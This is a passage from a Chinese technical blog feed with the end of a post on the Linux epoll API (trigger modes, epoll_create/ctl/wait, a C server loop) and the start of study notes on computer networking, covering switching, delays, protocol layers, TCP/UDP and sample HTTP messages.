进行处理，效率更高。</p></li><li><p>select、poll、epoll之间的区别</p><ul><li>select：只知道有I/O事件发生，但不知道是具体哪一个，因此只能无差别遍历所有流。时间复杂度$O(n)$，fd数量限制在 FD_SETSIZWE。</li><li>poll：大致同上，轮询所有套接字，时间复杂度为 $O(n)$，但fd没有数量限制，因为它使用链表存储fd。</li><li>epoll: <strong>事件驱动</strong>，epoll会把<strong>哪个流</strong>发生了<strong>怎样的IO事件</strong>通知给用户。时间复杂度$O(1)$。</li></ul></li><li><p>epoll提供了两种触发方式</p><ul><li>一种是传统 select/poll 的水平触发（Level Triggered, LT），缺省工作模式，同时还支持<strong>阻塞</strong>和<strong>非阻塞</strong>的socket。当某个文件描述符准备就绪后，内核会<strong>持续通知</strong>用户，直到重新变为未就绪状态。</li><li>再一种是边缘触发（Edge Triggered），高速工作模式，只支持<strong>非阻塞</strong>的socket。当某个文件描述符从未就绪<strong>变成</strong>就绪时，内核会通过epoll通知用户。<strong>注意，只通知一次</strong>。通知动作只会在文件描述符从未就绪变成就绪这个时刻触发。如果一个已经就绪的文件描述符迟迟不被处理，即一直位于就绪状态，那么该文件描述符就一直<strong>不会</strong>触发通知。</li></ul></li></ul><span id="more"></span><h2 id="二、相关函数-用法">二、相关函数 &amp; 用法</h2><h3 id="1-epoll-API-概述">1. epoll API 概述</h3><ul><li><p>epoll API 的核心概念为 <strong>epoll 实例</strong>，它是一个内核数据结构。从用户空间角度上考虑,可以将其视为两个列表:</p><ul><li><p>The <strong>interest</strong> list (有时也称作 epoll set)。它是一个存放<strong>已经注册 interest</strong> 的文件描述符集合。</p><blockquote><p>这个 interest 不太好翻译。可以简单的认为是工作列表。</p><p>为了便于说明，下文中关于 interest list相关的说明，一律以<strong>工作列表</strong>等价替换。</p></blockquote></li><li><p>The <strong>ready</strong> list。即<strong>就绪列表</strong>，是工作列表中，一组文件描述符子集的引用。当工作列表中存在某个文件描述符有IO活动，内核将会动态的把当前文件描述符填充至就绪列表中。</p></li></ul></li><li><p>有些函数会涉及到关于 epoll 实例的操作</p><ul><li><code>epoll_create</code>：新建一个 epoll 实例，执行时会返回一个指向 <strong>epoll 实例</strong>的文件描述符。</li><li><code>epoll_ctl</code> ：动态设置某个 epoll 实例的<strong>工作列表</strong>上的条目。</li><li><code>epoll_wait</code>：等待IO事件。如果当前没有事件（即就绪队列为空）则阻塞等待。</li></ul></li><li><p><strong>水平触发</strong>和<strong>边缘触发</strong></p><p>思考一下这个例子：</p><ol><li>文件描述符 rfd 作为管道的读取端，被注册进 epoll 实例中。</li><li>管道的另一端写入2kb数据至管道。</li><li>调用 <code>epoll_wait</code> 等待IO事件，返回 rfd。</li><li>管道本地端通过 rfd 读取了1kb的数据。</li><li>继续调用<code>epoll_wait</code>。结果是?</li></ol><p>如果文件描述符 rfd 被注册进 epoll 实例时使用<strong>边缘触发模式（EPOLLET）</strong>，那么第5步的函数调用<strong>将会被挂起</strong>，<strong>即便有数据没有读完</strong>。因为边缘触发模式仅在受监视的文件描述符上发生更改才会传送事件。</p><p>使用边缘触发模式时，最好使用<strong>非阻塞的文件描述符</strong>，这样可以避免阻塞其他等待读写的任务。</p><p><strong>水平触发模式</strong>在第5步的函数调用中不会被挂起，而是返回 rfd，因为缓冲区中仍然存在没有读完的数据。</p></li><li><p>一个简单的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MAX_EVENTS 10</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">epoll_event</span> ev, events[MAX_EVENTS];</span><br><span class="line"><span class="type">int</span> listen_sock, conn_sock, nfds, epollfd;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Code to set up listening socket, &#x27;listen_sock&#x27;,</span></span><br><span class="line"><span class="comment">              (socket(), bind(), listen()) omitted */</span></span><br><span class="line"></span><br><span class="line">epollfd = <span class="built_in">epoll_create1</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (epollfd == <span class="number">-1</span>) &#123;</span><br><span class="line">    <span class="built_in">perror</span>(<span class="string">&quot;epoll_create1&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">ev.events = EPOLLIN;</span><br><span class="line">ev.data.fd = listen_sock;</span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">epoll_ctl</span>(epollfd, EPOLL_CTL_ADD, listen_sock, &amp;ev) == <span class="number">-1</span>) &#123;</span><br><span class="line">    <span class="built_in">perror</span>(<span class="string">&quot;epoll_ctl: listen_sock&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (;;) &#123;</span><br><span class="line">    nfds = <span class="built_in">epoll_wait</span>(epollfd, events, MAX_EVENTS, <span class="number">-1</span>);</span><br><span class="line">    <span class="keyword">if</span> (nfds == <span class="number">-1</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;epoll_wait&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (n = <span class="number">0</span>; n &lt; nfds; ++n) &#123;</span><br><span class="line">        <span class="keyword">if</span> (events[n].data.fd == listen_sock) &#123;</span><br><span class="line">            conn_sock = <span class="built_in">accept</span>(listen_sock,</span><br><span class="line">                               (<span class="keyword">struct</span> sockaddr *) &amp;addr, &amp;addrlen);</span><br><span class="line">            <span class="keyword">if</span> (conn_sock == <span class="number">-1</span>) &#123;</span><br><span class="line">                <span class="built_in">perror</span>(<span class="string">&quot;accept&quot;</span>);</span><br><span class="line">                <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">setnonblocking</span>(conn_sock);</span><br><span class="line">            ev.events = EPOLLIN | EPOLLET;</span><br><span class="line">            ev.data.fd = conn_sock;</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">epoll_ctl</span>(epollfd, EPOLL_CTL_ADD, conn_sock,</span><br><span class="line">                          &amp;ev) == <span class="number">-1</span>) &#123;</span><br><span class="line">                <span class="built_in">perror</span>(<span class="string">&quot;epoll_ctl: conn_sock&quot;</span>);</span><br><span class="line">                <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">do_use_fd</span>(events[n].data.fd);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>注意事项</p><ul><li>两个不同的 epoll 实例可以等待相同的文件描述符。这样当目标文件描述符存在事件时，两个 epoll 实例均会收到该事件。</li><li>一个 epoll 实例的文件描述符可以被注册进另一个 epoll 实例的工作列表中，但是不能注册进自己的工作列表。</li><li>epoll API 是 <strong>Linux 平台独有</strong>的。</li></ul></li></ul><h3 id="2-epoll-create">2. epoll_create</h3><ul><li><p>函数声明</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/epoll.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_create</span><span class="params">(<span class="type">int</span> size)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_create1</span><span class="params">(<span class="type">int</span> flags)</span></span>; <span class="comment">// 除了 flags 可以传 EPOLL_CLOEXEC，其他与epoll_create一样。</span></span><br></pre></td></tr></table></figure></li><li><p>功能：打开一个指向新的 <strong>epoll 实例</strong>的文件描述符，该描述符将会用在所有 epoll 族的函数中。当该文件描述符不再使用时，使用<code>close</code>函数关闭。</p></li><li><p>函数参数size：调用者希望添加到epoll实例的文件描述符的<strong>数量</strong>。内核将使用该数量来<strong>提示</strong>初始时存放事件的内部数据结构中所分配的空间量。</p><blockquote><p>自 Linux 2.6.8 以后，epoll_create 中的 size参数被忽略，原因是现在的内核无需任何提示的size，即可动态调整所需数据结构的大小。</p><p>但是，<strong>size 不能传0</strong>。这是为了向后兼容。</p></blockquote></li><li><p>返回值</p><p>如果执行成功，则返回一个非负整数的文件描述符。否则返回-1并设置errno。</p></li></ul><h3 id="3-epoll-ctl">3. epoll_ctl</h3><ul><li><p>函数声明</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/epoll.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_ctl</span><span class="params">(<span class="type">int</span> epfd, <span class="type">int</span> op, <span class="type">int</span> fd, <span class="keyword">struct</span> epoll_event *event)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>功能：<strong>添加、修改或移除</strong> 参数 epfd 维护的<strong>工作列表</strong>中的<strong>条目</strong>。其中要求对<strong>目标描述符 fd</strong> 执行<strong>操作 op</strong>。</p></li><li><p>参数说明</p><ul><li><p>epfd：待操作的epoll 实例的文件描述符</p></li><li><p>op：操作码，有以下几个可选项：</p><ul><li><strong>EPOLL_CTL_ADD</strong>：将 fd 与事件 event 相联系，并添加进 epfd 的工作列表中。</li><li><strong>EPOLL_CTL_MOD</strong>：修改 fd 相联系的事件为传入的 event。</li><li><strong>EPOLL_CTL_DEL</strong>：将 fd 从工作列表中移除。event参数被忽略。</li></ul></li><li><p>fd：待操作的目标文件描述符</p></li><li><p>event：epoll事件结构</p><p>该结构如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">union</span> <span class="title class_">epoll_data</span> &#123;</span><br><span class="line">    <span class="type">void</span>        *ptr;</span><br><span class="line">    <span class="type">int</span>          fd;</span><br><span class="line">    <span class="type">uint32_t</span>     u32;</span><br><span class="line">    <span class="type">uint64_t</span>     u64;</span><br><span class="line">&#125; <span class="type">epoll_data_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">epoll_event</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span>     events;      <span class="comment">/* Epoll events */</span></span><br><span class="line">    <span class="type">epoll_data_t</span> data;        <span class="comment">/* User data variable */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>其中的<code>events</code>参数是一系列<strong>事件枚举的OR运算结果</strong>。事件枚举主要有以下几种：</p><ul><li><p><strong>EPOLLIN</strong>：关联的 fd 可用于 read 操作。</p></li><li><p><strong>EPOLLOUT</strong>：关联的 fd 可用于 write 操作。</p></li><li><p><strong>EPOLLRDHUP</strong>：远程主机关闭了连接。该标志对于在<strong>边缘触发模式</strong>下检查连接是否被关闭，有很大的帮助。</p></li><li><p><strong>EPOLLET</strong>：对关联的 fd 使用边缘触发模式，默认状态下是水平触发模式。</p></li><li><p><strong>EPOLLONESHOT</strong>：设置关联 fd 的单发行为。当使用 epoll_wait 将目标fd提取事件以后，当前fd将会在内部被禁用，此时 epoll 不会再报告其他事件。</p><p>这在 socket 里相当有用，即便使用ET模式，一个socket上的某个事件还是可能被触发多次。例如希望处理完当前socket的当前事件后，再来处理该socket的下一个事件，顺序处理。</p><p>处理完成后，用户必须手动调用 epoll_ctl 重置该标志位。</p></li><li><p><strong>EPOLLEXCLUSIVE</strong>：若有多个 epoll 实例关联当前 fd时，默认情况下当该fd有事件发生时，所有关联 epoll 实例均会收到事件。而倘若设置了EPOLLEXCLUSIVE标志，则每次事件来临时<strong>只会唤醒一个</strong> epoll 实例，避免<strong>惊群效应</strong>。</p></li></ul></li></ul></li><li><p>返回值说明</p><ul><li>当 epoll_ctl 函数工作正常，则返回 0。</li><li>当有错误发生时，返回 -1 并设置 errno。</li></ul></li></ul><h3 id="4-epoll-wait">4. epoll_wait</h3><ul><li><p>函数声明</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/epoll.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_wait</span><span class="params">(<span class="type">int</span> epfd, <span class="keyword">struct</span> epoll_event *events,</span></span></span><br><span class="line"><span class="params"><span class="function">               <span class="type">int</span> maxevents, <span class="type">int</span> timeout)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">epoll_pwait</span><span class="params">(<span class="type">int</span> epfd, <span class="keyword">struct</span> epoll_event *events,</span></span></span><br><span class="line"><span class="params"><span class="function">                <span class="type">int</span> maxevents, <span class="type">int</span> timeout,</span></span></span><br><span class="line"><span class="params"><span class="function">                <span class="type">const</span> <span class="type">sigset_t</span> *sigmask)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>功能：等待 epoll 实例中的事件发生。</p><p><code>epoll_wait</code>和<code>epoll_pwait</code>的不同点在于：<code>epoll_pwait</code>可以指定忽略部分信号。</p></li><li><p>参数说明</p><ul><li>epfd：待处理的 epoll 实例描述符。</li><li>events：用于存放 epoll_event 的<strong>数组</strong>指针。</li><li>maxevents：最多返回多少个事件至<code>events</code>数组中，注意该参数<strong>必须大于0</strong>。</li><li>timeout：最长等待/阻塞时间（毫秒）。置为 <code>-1</code> 将导致该函数<strong>无限期阻塞</strong>；置为0将导致函数立即返回，而不管是否存在可用事件。该时间基于<strong>CLOCK_MONOTONIC</strong>时钟测量。</li></ul></li><li><p>返回值说明</p><ul><li><p>若执行成功，则该函数返回<strong>处于就绪状态</strong>的文件描述符<strong>个数</strong>（起始可以简单看作事件个数）。</p></li><li><p>如果等待超时，则返回0，表示没有处于就绪状态的文件描述符。</p></li><li><p>若有错误发生，则返回 -1 并设置 errno。</p><blockquote><p>注意：若wait被 signal 中断，则 errno 会设置为 EINTR。</p></blockquote></li></ul></li><li><p>其他说明</p><ul><li><p>对于返回的事件中，某个epoll_event结构体中的 events 字段可能会被 epoll API 设置以下几种错误标志</p><ul><li><strong>EPOLLERR</strong>：相关联的 fd 发生了错误。若远程主机的读取端被关闭，则本地写入端会报告该错误。</li></ul></li></ul></li><li><p><strong>EPOLLHUP</strong>：相关联的 fd 被中断。该事件只表示远程主机关闭了该连接。当读取完管道中剩余的数据后，读取端会收到一个 EOF。</p></li><li><p>每个返回的 epoll_event 包含的 <strong>data 字段</strong>与最近调用 epoll_ctl（EPOLL_CTL_ADD，EPOLL_CTL_MOD）中为相应打开文件描述所指定的<strong>data 字段</strong>相同。 其中，<strong>events字段</strong>将会包含<strong>返回的事件</strong>位标志。</p><p><strong>epoll_event::data</strong> 是一个随着事件一起携带的字段，功能类似于多线程调用中的线程参数传递。</p><ul><li><p>epoll 实例的就绪队列中可能会同时存在多个事件。那么在调用 epoll_wait 函数时，该函数将会把对应的<strong>所有事件</strong>中的一小部分（maxevents 限制）统一返回给用户，而<strong>不是</strong>调用一次返回一个事件。</p></li><li><p>接上条，若事件个数超过 maxevents ，则接下来的epoll_wait调用将循环访问<strong>就绪文件描述符集</strong>。 此行为有助于避免出现饥饿的情况，即防止由于进程<strong>集中在一组已知的就绪文件描述符上</strong>，而无法注意到其他文件描述符进入就绪状态。</p></li><li><p>若epoll 实例的工作队列为空，则仍然可以执行 epoll_wait函数，该函数的运行将被阻塞，直到<strong>有文件描述符放入该工作队列并转为就绪状态</strong>。</p></li></ul></li></ul><h2 id="三、参考链接">三、参考链接</h2><ul><li><a href="https://baike.baidu.com/item/epoll/10738144?fr=aladdin">epoll - 百度百科</a></li><li><a href="https://blog.csdn.net/armlinuxww/article/details/92803381">Epoll原理解析 - CSDN</a></li><li><a href="https://www.cnblogs.com/aspirant/p/9166944.html">select、poll、epoll之间的区别(搜狗面试) - cnblog</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、概述&quot;&gt;一、概述&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;epoll 是  Linux 内核为了处理大批量的文件描述符而改进的 poll，是 Linux 下多路复用IO接口select/poll的增强版本。epoll可以显著提高程序在大量并发连接中只有少量活跃的情况下的系统的CPU利用率。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;服务器要管理多个客户端的连接，而 recv 函数只能监视单个 socket，因此引入了 select/poll。&lt;/p&gt;
&lt;p&gt;但 select 能监测的文件描述符个数限制在 FD_SETSIZE，通常是1024个。这对于并发量达到上万的服务器来说显然不够。与之相对的是，epoll所支持的fd上限是最大可以打开的数目，具体数字可以&lt;code&gt;cat /proc/sys/fs/file-max&lt;/code&gt;查看（本人机器上该值为&lt;code&gt;9223372036854775807&lt;/code&gt;）。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;当存在部分&lt;strong&gt;活跃&lt;/strong&gt;socket时，传统 select/poll 会&lt;strong&gt;线性扫描&lt;/strong&gt;整个socket集合，这会让效率随着socket数量的增加而线性下降，而这就是限制了 select 最大监视数量的原因，程序被唤醒后不知道是哪个 socket 处于活跃状态，需要遍历。&lt;/p&gt;
&lt;p&gt;而 epoll 是基于每个 fd 上面的 callback 函数实现，因此只会对活跃的 socket 进行处理，效率更高。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;select、poll、epoll之间的区别&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;select：只知道有I/O事件发生，但不知道是具体哪一个，因此只能无差别遍历所有流。时间复杂度$O(n)$，fd数量限制在 FD_SETSIZWE。&lt;/li&gt;
&lt;li&gt;poll：大致同上，轮询所有套接字，时间复杂度为 $O(n)$，但fd没有数量限制，因为它使用链表存储fd。&lt;/li&gt;
&lt;li&gt;epoll: &lt;strong&gt;事件驱动&lt;/strong&gt;，epoll会把&lt;strong&gt;哪个流&lt;/strong&gt;发生了&lt;strong&gt;怎样的IO事件&lt;/strong&gt;通知给用户。时间复杂度$O(1)$。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;epoll提供了两种触发方式&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;一种是传统 select/poll 的水平触发（Level Triggered, LT），缺省工作模式，同时还支持&lt;strong&gt;阻塞&lt;/strong&gt;和&lt;strong&gt;非阻塞&lt;/strong&gt;的socket。当某个文件描述符准备就绪后，内核会&lt;strong&gt;持续通知&lt;/strong&gt;用户，直到重新变为未就绪状态。&lt;/li&gt;
&lt;li&gt;再一种是边缘触发（Edge Triggered），高速工作模式，只支持&lt;strong&gt;非阻塞&lt;/strong&gt;的socket。当某个文件描述符从未就绪&lt;strong&gt;变成&lt;/strong&gt;就绪时，内核会通过epoll通知用户。&lt;strong&gt;注意，只通知一次&lt;/strong&gt;。通知动作只会在文件描述符从未就绪变成就绪这个时刻触发。如果一个已经就绪的文件描述符迟迟不被处理，即一直位于就绪状态，那么该文件描述符就一直&lt;strong&gt;不会&lt;/strong&gt;触发通知。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="Project" scheme="https://kiprey.github.io/categories/Project/"/>
    
    <category term="WebServer" scheme="https://kiprey.github.io/categories/Project/WebServer/"/>
    
    
    <category term="WebServer" scheme="https://kiprey.github.io/tags/WebServer/"/>
    
  </entry>
  
  <entry>
    <title>计算机网络笔记-1</title>
    <link href="https://kiprey.github.io/2021/05/cnatda-1/"/>
    <id>https://kiprey.github.io/2021/05/cnatda-1/</id>
    <published>2021-05-15T03:12:44.000Z</published>
    <updated>2025-11-24T03:59:39.821Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里记录了笔者阅读《计算机网络：自顶向下方法》的一些笔记。笔记有所缩略。</li><li>主要关于<ul><li>第一章：计算机网络和因特网</li><li>第二章：应用层</li><li>第三章：运输层</li></ul></li></ul><span id="more"></span><h2 id="第一章：计算机网络和因特网">第一章：计算机网络和因特网</h2><ul><li><p>所有的联网设备称为<strong>主机（host）<strong>或者</strong>端系统（end system）</strong>。</p></li><li><p>端系统通过<strong>通信链路communication link</strong>和<strong>分组交换机packet switch</strong>相连。</p><ul><li>分组交换机中最著名的两种是<strong>路由器router</strong>和<strong>链路层交换机link-layer switch</strong>。</li><li>一个分组所经历的一系列<strong>通信链路</strong>和<strong>分组交换机</strong>称为通过该网络的<strong>路径route/path</strong>。</li></ul></li><li><p>网络核心</p><blockquote><p>通过网络链路和交换机移动数据有两种基本方法：<strong>电路交换</strong>和<strong>分组交换</strong>。</p></blockquote><ul><li><p>分组交换：</p><p><img src="/2021/05/cnatda-1/image-20210507194417422.png" alt="image-20210507194417422"></p><ul><li><p>在各种网络应用中，端系统彼此交换<strong>报文message</strong>，报文能够包含协议设计者需要的任何东西，例如控制功能、数据等。</p></li><li><p>为了从源端系统向目的端系统发送一个报文，源将长报文划分为较小的数据块，称之为<strong>分组packet。</strong></p></li><li><p>多数分组交换机在链路的输入端使用<strong>存储转发传输store-and-forward transmission机制</strong>。指的是在交换机能够开始向输出链路传输该分组的第一个比特之前，必须接收到整个分组。</p><p><img src="/2021/05/cnatda-1/image-20210507193626489.png" alt="image-20210507193626489"></p></li><li><p>排队时延和分组丢失</p><ul><li>每台分组交换机有多条链路与之相连。对于每条相连的链路，该分组交换机具有一个<strong>输出缓存/输出队列</strong>，用于存储路由器准备发往那条链路的分组。</li><li>如果到达的分组需要传输到某条链路，但发现该链路正忙于传输其他分组，该到达分组必须在输出缓存中等待，因此除了存储转发时延以外，分组还要承受输出缓存的<strong>排队时延</strong>。如果该缓存已被完全装装满，则将出现<strong>分组丢失packet loss</strong>。</li></ul></li></ul></li><li><p>电路交换</p><ul><li><p>当两台主机通信时，该网络在两台主机之间创建一条专用的端到端连接。因此必须在两条链路的每条上先预留一条电路。</p><p><img src="/2021/05/cnatda-1/image-20210507194445844.png" alt="image-20210507194445844"></p></li><li><p>电路交换网络中的复用</p><blockquote><p>链路中的电路是通过<strong>频分复用FDM</strong>或<strong>时分复用TDM</strong>来实现。</p></blockquote><ul><li><p>对于频分复用FDM来说，链路的频谱由跨越链路创建的所有连接共享，为每个连接<strong>专用一个频段</strong>，例如收音机。</p></li><li><p>对于时分复用TDM来说，时间被划分为固定区间的帧，每帧被划分为固定数量的时隙。网络跨越一条链路创建一条连接时，网络在每个帧中为该连接指定一个时隙。这些时隙专门由该链接单独使用。</p></li></ul><p><img src="/2021/05/cnatda-1/image-20210507195514761.png" alt="image-20210507195514761"></p></li></ul></li><li><p>分组交换比电路交换更有效：</p><ul><li>提供更好的带宽共享。</li><li>更简单、有效，成本更低。</li></ul><p>电路交换不考虑需求，而预先分配了传输链路的使用，使得效率较低。分组交换按需分配链路使用，效率较高。</p></li></ul></li><li><p>分组交换的时延</p><ul><li><p><strong>节点处理时延</strong>：检查分组首部和决定将该分组导向何处所需要的时间，以及检查比特级别的差错等时间。</p></li><li><p><strong>排队时延</strong>：在队列中，当分组在链路上等待传输时，它经受排队时延。一个特定分组的排队时延长度取决于先期到达的正在排队等待向链路传输的分组数量。</p></li><li><p><strong>传输时延</strong>：传输时延是将<strong>特定分组的所有比特</strong>，<strong>发射进链路</strong>所需要的时间。传输时延与分组大小呈正相关。</p></li><li><p><strong>传播时延</strong>：从该链路的起点到下一个路由器传播所需要的时间。</p><blockquote><p>注意：传输时延和传播时延不是一回事，两者概念完全不同。</p></blockquote></li></ul><blockquote><p>四个相加即<strong>总时延</strong>。$d_{nodal}=d_{proc}+d_{queue}+d_{trans}+d_{prop}$</p></blockquote></li><li><p>协议分层</p><ul><li><p><strong>应用层</strong>：网络应用程序以及他们的应用层协议存留的地方，例如http、smtp等。</p></li><li><p><strong>运输层</strong>：运输层在应用程序端点之间传送应用层报文，有以下两种运输协议：</p><ul><li><strong>TCP</strong>：将长报文划分为短报文，提供拥塞控制机制。</li><li><strong>UDP</strong>：向应用程序提供无连接服务，不提供不必要服务，没有可靠性，没有流量控制，没有拥塞控制。</li></ul><p>将运输层的分组称为<strong>报文段segment</strong>。</p></li><li><p><strong>网络层</strong>：网络层负责将称为<strong>数据报datagram</strong>的网络层分组从一台主机移动到另一台主机。<strong>网络层包括著名网际协议IP。</strong></p></li><li><p><strong>链路层</strong>：网络层通过源和目的地之间的一系列路由器来 <strong>路由（注意这是动词）</strong> 数据报。为了将分组从一个结点移动到路径上的下一个结点，网络层必须依靠该链路层的服务。</p><p>将链路层分组称为<strong>帧frame</strong>。链路层的任务是将<strong>整个帧</strong>从一个网络元素移动到邻近的网络元素。该层协议与链路层相关。</p></li><li><p><strong>物理层</strong>：物理层的任务是将每个帧中的一个个比特从一个节点移动到下一个节点。该层协议与链路相关，并进一步与链路的<strong>实际传输媒体</strong>相关，例如双绞铜线、单模光纤等。</p></li></ul><p>各层的所有协议称为<strong>协议栈</strong>。</p><p><img src="/2021/05/cnatda-1/image-20210507202004763.png" alt="image-20210507202004763"></p></li></ul><h2 id="第二章：应用层">第二章：应用层</h2><h3 id="1-因特网提供的运输服务">1. 因特网提供的运输服务</h3><ul><li><p>TCP服务</p><ul><li><p><strong>面向连接的服务</strong>：</p><p>在应用层数据报文开始流动之前，TCP让客户和服务器互相交换<strong>运输层</strong>控制信息。这个握手过程提醒客户和服务器为大量分组的到来做好准备。</p><p>三次握手完成后，一个<strong>TCP连接</strong>就在两个进程之间建立，该连接是<strong>全双工</strong>的，即连接的双方可以在此连接上<strong>同时进行报文的收发</strong>。</p><p>当应用程序结束报文发送时，必须拆除该连接。</p></li><li><p><strong>可靠的数据传送服务</strong>：</p><p>通信进程能够依靠TCP，无差错、按顺序交付所有发送的数据，无字节丢失或冗余。</p></li><li><p>具有拥塞控制机制。</p></li></ul><blockquote><p><strong>安全套接字SSL</strong>：TCP的加强版本，即加密版本。</p><p>SSL有自己的套接字API，应用向SSL套接字传递明文数据，发送主机中SSL加密该数据并将加密后数据传递给<strong>发送端TCP套接字</strong>。接收端套接字接收到加密数据，将其解密，并通过SSL套接字将明文数据传递给接收进程。</p></blockquote></li><li><p>UDP服务</p><ul><li>是一种不提供不必要服务的轻量级运输协议，仅提供最小服务。</li><li>UDP是无连接的，因此两进程通信前没有握手过程。</li><li>UDP协议提供不可靠数据传送服务，即UDP协议<strong>不保证报文到达接受进程</strong>，同时接收到的报文也<strong>可能是乱序的</strong>。无拥塞控制机制。</li></ul></li></ul><h3 id="2-应用层协议">2. 应用层协议</h3><h4 id="a-http">a. http</h4><ul><li><p><strong>请求报文</strong>样例如下：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GET /somedir/page.html HTTP/1.1</span><br><span class="line">Host: www.someschool.edu</span><br><span class="line">Connection: close</span><br><span class="line">User-agent: Mozilla/5.0</span><br><span class="line">Accept-language: fr</span><br></pre></td></tr></table></figure><p>具体<strong>请求报文</strong>通用格式如下：</p><p><img src="/2021/05/cnatda-1/image-20210507204906032.png" alt="image-20210507204906032"></p></li><li><p><strong>响应报文</strong>样例如下：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Connection: close</span><br><span class="line">Date: Tue, 18 Aug 2015 15:44:04 GMT</span><br><span class="line">Server: Apache/2.23 (CentOS)</span><br><span class="line">Last-Modified: Tue, 18 Aug 2015 15:11:03 GMT</span><br><span class="line">Content-Length: 6821</span><br><span class="line">Content-Type: text/html</span><br><span class="line"></span><br><span class="line">(data data data data data ...)</span><br></pre></td></tr></table></figure><p>具体通用格式如下：</p><p><img src="/2021/05/cnatda-1/image-20210507205312687.png" alt="image-20210507205312687"></p></li><li><p><strong>web 